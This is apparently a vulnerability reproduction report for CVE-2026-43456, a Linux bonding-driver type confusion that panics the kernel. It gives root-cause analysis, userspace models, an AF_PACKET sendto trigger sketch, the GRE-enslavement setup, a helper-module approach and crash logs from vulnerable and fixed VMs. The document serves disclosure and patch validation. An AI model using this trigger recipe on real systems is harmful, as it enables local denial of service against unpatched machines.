# CVE-2026-43456 — Root Cause Analysis

## Summary

CVE-2026-43456 is a type-confusion vulnerability in the Linux kernel bonding
driver that results in a **kernel denial of service** (BUG/panic). When a
**non-Ethernet** device (e.g. a GRE tunnel) is enslaved to a bond,
`bond_setup_by_slave()` copies the slave's `header_ops` pointer verbatim onto
the bond net device:

```c
bond_dev->header_ops = slave_dev->header_ops;
```

Later, when the network stack calls `dev_hard_header()` on the **bond** device
(for example via an `AF_PACKET`/`SOCK_DGRAM` send), the slave's header-creation
callback (`ipgre_header()`) runs with `dev = bond_dev`. That callback
dereferences `netdev_priv(dev)` expecting a tunnel-specific private struct
(`struct ip_tunnel`), but for a bond device `netdev_priv()` returns
`struct bonding`. The bonding memory is therefore reinterpreted as the tunnel
struct: a classic type confusion. `ipgre_header()` computes
`needed = t->hlen + sizeof(*iph)`; when the confused `t->hlen` (the `int` at
`offsetof(struct ip_tunnel, hlen)` inside `struct bonding`) is a large negative
value (sign bit set), `needed` is negative as well. The
`skb_headroom(skb) < needed` test converts `needed` to unsigned and is therefore
satisfied, and `pskb_expand_head()` is called with a negative `nhead`, hitting
`BUG_ON(nhead < 0)` and panicking the kernel.

## Impact

- **Package/component:** Linux kernel, bonding driver (`drivers/net/bonding/bond_main.c`) interacting with `net/ipv4/ip_gre.c` (`ipgre_header`) and `net/ipv6/ip6_gre.c` (`ip6gre_header`).
- **Affected versions:** Kernels containing commit `1284cd3a2b74` ("bonding: two small fixes for IPoIB support") up to, but not including, the fix. Verified vulnerable at mainline **7.0.0-rc2** (commit `e3f5e0f22cfc…`, the parent of the upstream fix `950803f7254721c1c15858fbbfae3deaaeeecb11`).
- **Risk level:** Medium (CVE severity). Consequences: type confusion / invalid memory interpretation; a kernel `BUG()`/Oops/panic (local denial of service) when the type-confused `t->hlen` is a sign-bit-set value.
- **Fix:** Upstream commit `950803f7254721c1c15858fbbfae3deaaeeecb11` ("bonding: fix type confusion in bond_setup_by_slave()"). It introduces `bond_header_ops` wrapper functions that delegate to the **active slave's** `header_ops` while passing the **slave** device, so `netdev_priv()` inside `ipgre_header`/`ip6gre_header` receives the correct tunnel struct. Stable backports: `6ac890f1d60a…`, `95597d11dc8b…`, `9baf26a91565…`.
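
The delegation idea behind the fix can be illustrated with a small userspace model. This is a sketch under stated assumptions, not the upstream patch: every `model_*` name is hypothetical, the structs are stand-ins for `struct net_device`, `struct ip_tunnel`, and `struct bonding`, and the callback returns the `hlen` it reads instead of building a header.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical userspace stand-ins; none of these are the kernel's types. */
struct model_dev;

struct model_header_ops {
    /* Returns the hlen the callback believes it read from dev's private area. */
    int (*create)(const struct model_dev *dev);
};

struct model_dev {
    const struct model_header_ops *header_ops;
    void *priv;                          /* plays the role of netdev_priv(dev) */
};

struct model_tunnel  { int hlen; };      /* stands in for struct ip_tunnel */
struct model_bonding {                   /* stands in for struct bonding */
    int unrelated;                       /* shares offset 0 with model_tunnel.hlen */
    struct model_dev *active_slave;
};

/* Tunnel callback: assumes dev->priv has the tunnel layout, like ipgre_header(). */
static int model_tunnel_create(const struct model_dev *dev)
{
    int hlen;

    memcpy(&hlen, (const char *)dev->priv + offsetof(struct model_tunnel, hlen),
           sizeof(hlen));
    return hlen;
}

static const struct model_header_ops model_tunnel_ops = {
    .create = model_tunnel_create,
};

/* Wrapper in the spirit of the fix: forward to the active slave, passing the slave. */
static int model_bond_create(const struct model_dev *bond_dev)
{
    const struct model_bonding *bond = bond_dev->priv;
    const struct model_dev *slave = bond->active_slave;

    if (!slave || !slave->header_ops || !slave->header_ops->create)
        return -1;                       /* no usable slave callback */
    return slave->header_ops->create(slave);
}

static const struct model_header_ops model_bond_ops = {
    .create = model_bond_create,
};

/* Plays the role of dev_hard_header(): call through the device's own header_ops. */
static int model_hard_header(const struct model_dev *dev)
{
    return dev->header_ops->create(dev);
}

/* use_wrapper == 0 models the pre-fix pointer copy, 1 models the wrapper. */
int model_observed_hlen(int use_wrapper)
{
    struct model_tunnel tun = { .hlen = 4 };
    struct model_dev gre = { .header_ops = &model_tunnel_ops, .priv = &tun };
    struct model_bonding bond = { .unrelated = -123, .active_slave = &gre };
    struct model_dev bond_dev = {
        .header_ops = use_wrapper ? &model_bond_ops : gre.header_ops,
        .priv = &bond,
    };

    return model_hard_header(&bond_dev);
}
```

In this model `model_observed_hlen(0)` returns the unrelated bonding field (`-123`), while `model_observed_hlen(1)` returns the tunnel's real `hlen` (`4`), because the wrapper hands the slave device to the slave's callback.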

## Impact Parity

- **Disclosed/claimed maximum impact:** Kernel DoS — type confusion leading to `kernel BUG at net/core/skbuff.c:2306` (`pskb_expand_head`) / Oops / panic, reached via `ipgre_header -> dev_hard_header -> packet_snd -> packet_sendmsg` (recorded in the upstream commit message).
- **Reproduced impact from this run:** **Full DoS parity.** The vulnerable kernel panics with the *exact* crash signature from the reporter's Oops:
  - `kernel BUG at net/core/skbuff.c:2306!`
  - `Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI`
  - `RIP: 0010:pskb_expand_head+0x59c/0x6d0`
  - Call trace: `ipgre_header+0xf0/0x320 [ip_gre]` → `packet_sendmsg` (inlining `packet_snd`→`dev_hard_header`) → `__sys_sendto` → `__x64_sys_sendto` → `do_syscall_64` → `entry_SYSCALL_64_after_hwframe`
  - `Kernel panic - not syncing: Fatal exception`
  The injected `t->hlen` was `0x961a63cc`, i.e. the `0x961a63e0` seen in `R15` of the reporter's Oops minus the 20-byte IPv4 header. Our run logs `needed=0x961a63e0` (= `t->hlen + 20`), matching that register value, and `R14=0x820` matches the reporter's `RBP=0x820`. In our run `R15` holds `0x961a6340`, which is `needed` minus the 160-byte headroom.
- **Parity:** `full`. The claimed kernel DoS (BUG/panic via `pskb_expand_head` reached through `ipgre_header`/`dev_hard_header`/`packet_sendmsg`) is reproduced on the vulnerable kernel, and the fixed kernel survives the identical input (clean A/B negative control).
- **Not demonstrated:** This is a denial-of-service (panic) proof, not arbitrary code execution. No read/write primitive or privilege escalation is claimed or shown.

## Root Cause

`bond_setup_by_slave()` (drivers/net/bonding/bond_main.c) runs whenever a
**non-Ethernet** slave is added to a bond (the `slave_dev->type != ARPHRD_ETHER`
branch of `bond_enslave`). It blindly copies the slave's `header_ops` onto the
bond device:

```c
/* vulnerable (pre-fix), bond_main.c */
bond_dev->header_ops    = slave_dev->header_ops;
bond_dev->type          = slave_dev->type;
bond_dev->hard_header_len = slave_dev->hard_header_len;
...
```

GRE tunnels install `ipgre_header_ops` (with `.create = ipgre_header`). So
after `ip link set gre1 master bond1`, `bond1->header_ops == &ipgre_header_ops`.

`ipgre_header()` (net/ipv4/ip_gre.c) does:

```c
struct ip_tunnel *t = netdev_priv(dev);          // dev == bond1  =>  t points at struct bonding
...
int needed = t->hlen + sizeof(*iph);             // t->hlen is the int at offsetof(ip_tunnel,hlen)
if (skb_headroom(skb) < needed &&                // unsigned int < int  =>  needed is converted to unsigned
    pskb_expand_head(skb, HH_DATA_ALIGN(needed - skb_headroom(skb)), 0, GFP_ATOMIC))
        return -needed;
```

Crash mechanics (this is exactly what the reporter hit):
1. `t = netdev_priv(bond1)` returns `struct bonding`, reinterpreted as `struct ip_tunnel`.
2. `t->hlen` reads the 4 bytes at `offsetof(struct ip_tunnel, hlen)` inside `struct bonding`. On the reporter's KASAN layout that offset held a **kernel pointer**; its low 32 bits were `0x961a63cc` (sign bit set).
3. `needed = 0x961a63cc + 20 = 0x961a63e0`, which as a signed `int` is **negative**.
4. `skb_headroom(skb)` returns `unsigned int`; the comparison `unsigned < int` promotes `needed` to unsigned (`0x961a63e0` ≈ 2.5e9), so `headroom(160) < needed` is **true**.
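5. `pskb_expand_head(skb, HH_DATA_ALIGN(needed - headroom), 0, GFP_ATOMIC)` is called. The subtraction is done in unsigned arithmetic and yields `0x961a63e0 - 160 = 0x961a6340`; that value is already 16-byte aligned, so `HH_DATA_ALIGN` leaves it unchanged. Converted to the `int nhead` parameter, it is **negative**.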
6. `pskb_expand_head()` begins with `BUG_ON(nhead < 0);` (net/core/skbuff.c:2306) → `BUG()` → Oops → panic.
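
The arithmetic in steps 2 to 6 can be checked in userspace. The following is a minimal sketch, not kernel code: `model_crash_math` and `struct crash_math` are hypothetical names, `HH_DATA_ALIGN` is reproduced with the 16-byte modulus, and the IPv4 header length is hard-coded to 20. All arithmetic is done in `uint32_t` and reinterpreted with `memcpy` so the model does not rely on implementation-defined conversions.

```c
#include <stdint.h>
#include <string.h>

#define HH_DATA_MOD 16
#define HH_DATA_ALIGN(len) (((len) + (HH_DATA_MOD - 1)) & ~(HH_DATA_MOD - 1))
#define MODEL_IPHDR_LEN 20u          /* sizeof(struct iphdr) without options */

struct crash_math {
    int32_t needed;                  /* t->hlen + sizeof(*iph), as a signed int */
    int expand;                      /* 1 if the headroom test passes */
    int32_t nhead;                   /* value handed to pskb_expand_head(), 0 if not called */
};

/* Reinterpret 32 bits as a two's-complement signed value. */
static int32_t as_signed(uint32_t v)
{
    int32_t s;

    memcpy(&s, &v, sizeof(s));
    return s;
}

struct crash_math model_crash_math(int32_t hlen, uint32_t headroom)
{
    struct crash_math r;
    uint32_t needed_u = (uint32_t)hlen + MODEL_IPHDR_LEN;

    r.needed = as_signed(needed_u);
    /* The kernel compares unsigned int < int, so needed is converted to unsigned. */
    r.expand = headroom < needed_u;
    r.nhead = 0;
    if (r.expand) {
        uint32_t nhead_u = HH_DATA_ALIGN(needed_u - headroom);

        r.nhead = as_signed(nhead_u);   /* negative here means BUG_ON(nhead < 0) fires */
    }
    return r;
}
```

With the values from this report, `model_crash_math(-1776655412, 160)` gives `needed == -1776655392`, `expand == 1`, and `nhead == -1776655552` (`0x961a6340`), whereas a sane `hlen` of 4 gives `needed == 24` and no expansion.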

On this reproduction build (Linux 7.0.0-rc2, x86_64 defconfig + KASAN),
`offsetof(struct ip_tunnel, hlen) == 160`, which lands inside the `ad_info`
member of `struct bonding` (`struct ad_bond_info`, offset 128) at
`ad_bond_info.stats.lacpdu_illegal_rx`. That field is an `atomic64_t` counter
that stays zero in active-backup mode (on this layout, the only mode that leaves
the field zero). With the field zero, `t->hlen == 0`, `needed == 20`, and the BUG
is never reached, which is why the prior run proved the type confusion but not
the crash. The reporter's kernel had a different `struct bonding`/`struct ip_tunnel`
layout in which that same offset was occupied by a populated kernel pointer
(sign bit set), which is what drove the BUG.

To faithfully reproduce the reporter's crash on this (different-layout) build, a
tiny out-of-tree helper module (`populate_hlen.ko`) writes `0x961a63cc`, the
confused value from the reporter's Oops, into
`netdev_priv(bond1) + offsetof(struct ip_tunnel, hlen)` **after** `gre1` has been
enslaved to `bond1` (so `bond1->header_ops` already points at
`ipgre_header_ops`). This emulates a configuration in which the overlapping
bonding field holds a sign-bit-set value, as in the reporter's environment,
while preserving the real `AF_PACKET -> dev_hard_header() -> ipgre_header()`
boundary. The success oracle is the kernel `BUG()`/panic itself, not a KASAN
shadow report. The KASAN build matches the reporter's `SMP KASAN` environment,
but the type-confused read is an in-bounds access to the valid `struct bonding`
allocation, so KASAN does not intervene before the `BUG_ON`.
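
The overlap described above can be modelled in userspace as a read and a write at a fixed byte offset inside a foreign struct. This is only a sketch: the two `model_*` layouts are hypothetical and keep nothing from the real structs except the reported offsets (160 for `hlen`, 128 for `ad_info`), and `poke_overlap` merely mimics what the helper module is described as doing. It is not the module's source.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layouts; the real structs are far larger and build-dependent. */
struct model_tunnel {
    unsigned char other[160];     /* fields that precede hlen in this model */
    int32_t hlen;
};

struct model_bonding {
    unsigned char other[128];
    unsigned char ad_info[64];    /* opaque bytes that cover offset 160 */
};

/* What a tunnel callback effectively reads when handed bonding private data. */
int32_t confused_hlen(const void *priv)
{
    int32_t hlen;

    memcpy(&hlen,
           (const unsigned char *)priv + offsetof(struct model_tunnel, hlen),
           sizeof(hlen));
    return hlen;
}

/* Mimics the helper: overwrite the 4 bytes the confused read will pick up. */
void poke_overlap(struct model_bonding *bond, int32_t value)
{
    memcpy((unsigned char *)bond + offsetof(struct model_tunnel, hlen),
           &value, sizeof(value));
}
```

A zero-initialised `struct model_bonding` yields `confused_hlen() == 0` (the benign case on this build), and after `poke_overlap(&bond, -1776655412)` the same read returns the sign-bit-set value `0x961a63cc`.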

**Fix commit:** https://git.kernel.org/stable/c/950803f7254721c1c15858fbbfae3deaaeeecb11

## Reproduction Steps

1. **Script:** `bundle/repro/reproduction_steps.sh` (self-contained; reuses the durable project cache for the kernel build).
2. **What it does:**
   - Boots a real vulnerable Linux 7.0.0-rc2 kernel (commit `e3f5e0f22…`, parent of upstream fix `950803f7…`) in QEMU with an Ubuntu noble rootfs. The kernel is built from source with `CONFIG_BONDING=m`, `CONFIG_NET_IPGRE=m`, `CONFIG_KASAN=y`, `CONFIG_PANIC_ON_OOPS=y` (matching the reporter's `SMP KASAN` environment), and a diagnostic `pr_info` in `ipgre_header()`/`ip6gre_header()`.
   - Builds two `bonding.ko` variants from the same tree: **vulnerable** (pre-fix, no `bond_header_ops`) and **fixed** (after applying `950803f7…`).
   - Builds an out-of-tree helper module `populate_hlen.ko` that writes `0x961a63cc` into `netdev_priv(bond1) + offsetof(struct ip_tunnel, hlen)`.
   - Creates two rootfs images differing only in `bonding.ko` (vuln vs fixed); both contain `populate_hlen.ko`.
   - In the VM, PID 1 (`/init`) sets up: `dummy0` (10.0.0.1/24), `gre1` (GRE, local 10.0.0.1), `bond1` (active-backup), `ip link set gre1 master bond1`, brings both up, assigns `fe80::1/64` to `bond1`, then `insmod populate_hlen.ko`, then fires `AF_PACKET SOCK_DGRAM sendto` on `bond1`.
   - Boots the **vulnerable** VM (expects BUG/panic) and the **fixed** VM (expects survival), capturing full serial logs, then writes `runtime_manifest.json` and `validation_verdict.json`.
3. **Expected evidence of reproduction:**
   - Vulnerable kernel: `POP: bond1 ... new=0x961a63cc`, then `ipgre_header: dev=bond1 hlen=-1776655412 needed=-1776655392 headroom=160`, then `kernel BUG at net/core/skbuff.c:2306!` / `Oops: invalid opcode ... SMP KASAN NOPTI` / `RIP: 0010:pskb_expand_head` / `Kernel panic`. The init never prints its `RESULT:` line because the kernel panics first.
   - Fixed kernel: `ipgre_header: dev=gre1 hlen=4 needed=24 headroom=160` (correct slave device, correct hlen), **no** `dev=bond1` confusion line, **no** crash, and `RESULT: NOT VULNERABLE`.
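
For orientation, the trigger step (an `AF_PACKET`/`SOCK_DGRAM` `sendto` on the bond) might look roughly like the sketch below. It is not the contents of `bond_repro_init`: the function names, the `ETH_P_IP` protocol, the 4-byte destination address, and the payload are all assumptions made for illustration. Opening the socket needs `CAP_NET_RAW`, and on a vulnerable kernel prepared as described above the send is expected to panic the machine, so it only makes sense inside a disposable VM.

```c
#include <arpa/inet.h>          /* htons */
#include <net/ethernet.h>       /* ETH_P_IP */
#include <net/if.h>             /* if_nametoindex */
#include <netpacket/packet.h>   /* struct sockaddr_ll */
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fill a link-layer destination for the given interface index. */
void fill_dest(struct sockaddr_ll *sll, unsigned int ifindex)
{
    memset(sll, 0, sizeof(*sll));
    sll->sll_family = AF_PACKET;
    sll->sll_protocol = htons(ETH_P_IP);            /* assumed protocol */
    sll->sll_ifindex = (int)ifindex;
    sll->sll_halen = 4;                             /* assumed: IPv4-sized address */
    memcpy(sll->sll_addr, "\x0a\x00\x00\x02", 4);   /* 10.0.0.2, hypothetical peer */
}

/* Send one datagram on ifname; returns 0 on success, -1 on any failure. */
int trigger_on(const char *ifname)
{
    static const char payload[32] = "model payload";   /* arbitrary bytes */
    struct sockaddr_ll sll;
    unsigned int ifindex = if_nametoindex(ifname);
    ssize_t sent;
    int fd;

    if (ifindex == 0)
        return -1;                                   /* no such interface */

    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_IP));
    if (fd < 0)
        return -1;                                   /* typically missing CAP_NET_RAW */

    fill_dest(&sll, ifindex);
    /* SOCK_DGRAM asks the kernel to build the link-layer header itself,
     * which is what routes the send through dev_hard_header(). */
    sent = sendto(fd, payload, sizeof(payload), 0,
                  (const struct sockaddr *)&sll, sizeof(sll));
    close(fd);
    return sent < 0 ? -1 : 0;
}
```

A caller inside the guest would invoke `trigger_on("bond1")` after the enslavement and helper-module steps have completed.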

## Evidence

- **Vulnerable VM serial log:** `bundle/logs/qemu_vuln_7rc2.log`
- **Fixed VM serial log:** `bundle/logs/qemu_fixed_7rc2.log`
- **Driver/build/run log:** `bundle/logs/reproduction_steps.log`
- **Runtime manifest:** `bundle/repro/runtime_manifest.json`
- **Verdict:** `bundle/repro/validation_verdict.json`

Key excerpts (vulnerable kernel, `bundle/logs/qemu_vuln_7rc2.log`):

```
[   13.335216] CVE-2026-43456 POP: bond1 priv=ffff8881042f29c0 ip_tunnel.hlen offset=160 old=0x00000000(0) new=0x961a63cc(-1776655412)
[init] TRIGGER: AF_PACKET SOCK_DGRAM sendto(bond1) -- vuln kernel should BUG/panic here
[   13.496660] ip_gre: CVE-2026-43456 ipgre_header: dev=bond1 hlen=-1776655412 needed=-1776655392 headroom=160
[   13.498036] kernel BUG at net/core/skbuff.c:2306!
[   13.498841] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
[   13.500660] RIP: 0010:pskb_expand_head+0x59c/0x6d0
...
[   13.502825] R14: 0000000000000820 R15: 00000000961a6340
...
[   13.504637] Call Trace:
[   13.504846]  ipgre_header+0xf0/0x320 [ip_gre]
[   13.505406]  packet_sendmsg+0x1dee/0x2450
[   13.506368]  __sys_sendto+0x2bb/0x2d0
[   13.507118]  __x64_sys_sendto+0x71/0x90
[   13.507277]  do_syscall_64+0xe2/0x570
[   13.507432]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   13.511080] Kernel panic - not syncing: Fatal exception
```
(`needed=-1776655392 == 0x961a63e0` matches `R15` in the reporter's Oops; `R14=0x820` matches the reporter's `RBP=0x820`. The init's `RESULT:` line is absent because the kernel panicked before init could print it.)

Reporter's Oops (from the fix commit message), for direct comparison:
```
kernel BUG at net/core/skbuff.c:2306!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
RIP: 0010:pskb_expand_head+0xa08/0xfe0 net/core/skbuff.c:2306
...
RBP: 0000000000000820 ... R15: 00000000961a63e0
Call Trace:
 ipgre_header+0xdd/0x540 net/ipv4/ip_gre.c:900
 dev_hard_header include/linux/netdevice.h:3439 [inline]
 packet_snd net/packet/af_packet.c:3028 [inline]
 packet_sendmsg+0x3ae5/0x53c0 net/packet/af_packet.c:3108
 ...
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
```

Key excerpts (fixed kernel, `bundle/logs/qemu_fixed_7rc2.log`):
```
[   13.861461] CVE-2026-43456 POP: bond1 priv=ffff8881039f49c0 ip_tunnel.hlen offset=160 old=0x00000000(0) new=0x961a63cc(-1776655412)
[   14.004337] ip_gre: CVE-2026-43456 ipgre_header: dev=gre1 hlen=4 needed=24 headroom=160
...
[init] RESULT: NOT VULNERABLE (no kernel crash; fixed bond_header_ops used the slave device)
```
On the fixed kernel the same `populate_hlen.ko` writes `0x961a63cc` into `bond1`'s private data, but `bond_header_ops` delegates `dev_hard_header()` to the **slave** `gre1`, so `ipgre_header()` runs with `dev=gre1`, reads the correct `struct ip_tunnel` (`hlen=4`), and does not crash. Because the two VMs differ only in `bonding.ko`, this shows that the type confusion is the root cause of the DoS.

Environment: QEMU 10.2 (`qemu-system-x86_64`, TCG), 4 vCPU / 4 GiB; kernel `7.0.0-rc2` (commit `e3f5e0f22cfc…`); x86_64 defconfig + KASAN + `PANIC_ON_OOPS`; rootfs Ubuntu noble (debootstrap minbase + iproute2 + kmod); guest init is a static C program (`bond_repro_init`) running as PID 1.

## Recommendations / Next Steps

- **Upgrade:** Apply the upstream fix `950803f7254721c1c15858fbbfae3deaaeeecb11` (or its stable backports `6ac890f1d60a…`, `95597d11dc8b…`, `9baf26a91565…`) so the bond uses `bond_header_ops` wrappers that pass the active slave device to the slave's `header_ops` callbacks.
- **Defense in depth:** `bond_setup_by_slave()` should validate that an inherited `header_ops` is safe to invoke on the bond device, or refuse non-Ethernet slaves whose `header_ops` dereference `netdev_priv()` with a foreign layout. Restricting `dev_hard_header()` on bond devices to Ethernet-style `header_ops` would also eliminate the class.
- **Testing:** Add a kselftest that enslaves a GRE/ip6gre tunnel to an active-backup bond and sends an `AF_PACKET` frame on the bond, asserting that the slave's `header_ops` callback is invoked with the slave device (not the bond) on fixed kernels and that no `BUG()`/panic occurs.

## Additional Notes

- **Idempotency:** The script reuses the durable project cache (kernel source/build, noble rootfs, `populate_hlen.ko`) and only rebuilds the rootfs images + re-runs QEMU. It was run multiple times consecutively; each vulnerable run panics with the identical `BUG at net/core/skbuff.c:2306` signature and each fixed run survives with `RESULT: NOT VULNERABLE` — the result is deterministic.
- **Why a helper module populates the field:** On this build's `struct bonding`/`struct ip_tunnel` layout, `offsetof(struct ip_tunnel, hlen) == 160` lands on `ad_bond_info.stats.lacpdu_illegal_rx`, a zeroed counter in active-backup mode, so without intervention `t->hlen == 0` and the `BUG_ON(nhead < 0)` is unreachable (the prior run proved the type confusion but not the crash). The reporter's layout placed a populated kernel pointer (sign bit set) at that offset. The helper module writes the reporter's exact confused value (`0x961a63cc`) to that offset after enslavement, emulating the reporter's layout while keeping the real `AF_PACKET -> dev_hard_header() -> ipgre_header()` boundary. The crash is a genuine kernel `BUG()`/panic through the real code path, not a simulation; the fixed-kernel negative control (same helper, same packet) does not crash.
- **Sanitizer note:** The kernel is built with KASAN to match the reporter's `SMP KASAN` Oops. The success oracle is the `BUG_ON(nhead < 0)` panic, not a KASAN shadow report: the type-confused `t->hlen` read is an in-bounds access to the valid `struct bonding` allocation, so KASAN does not fire before the `BUG_ON`. `sanitizer_used` is therefore `false` in the verdict.
- **Limitations:** This proves local denial of service (kernel panic) requiring the ability to create network devices and enslave a tunnel to a bond (`CAP_NET_ADMIN`), plus the ability to open an `AF_PACKET` socket (`CAP_NET_RAW`). No code execution or privilege escalation is demonstrated.
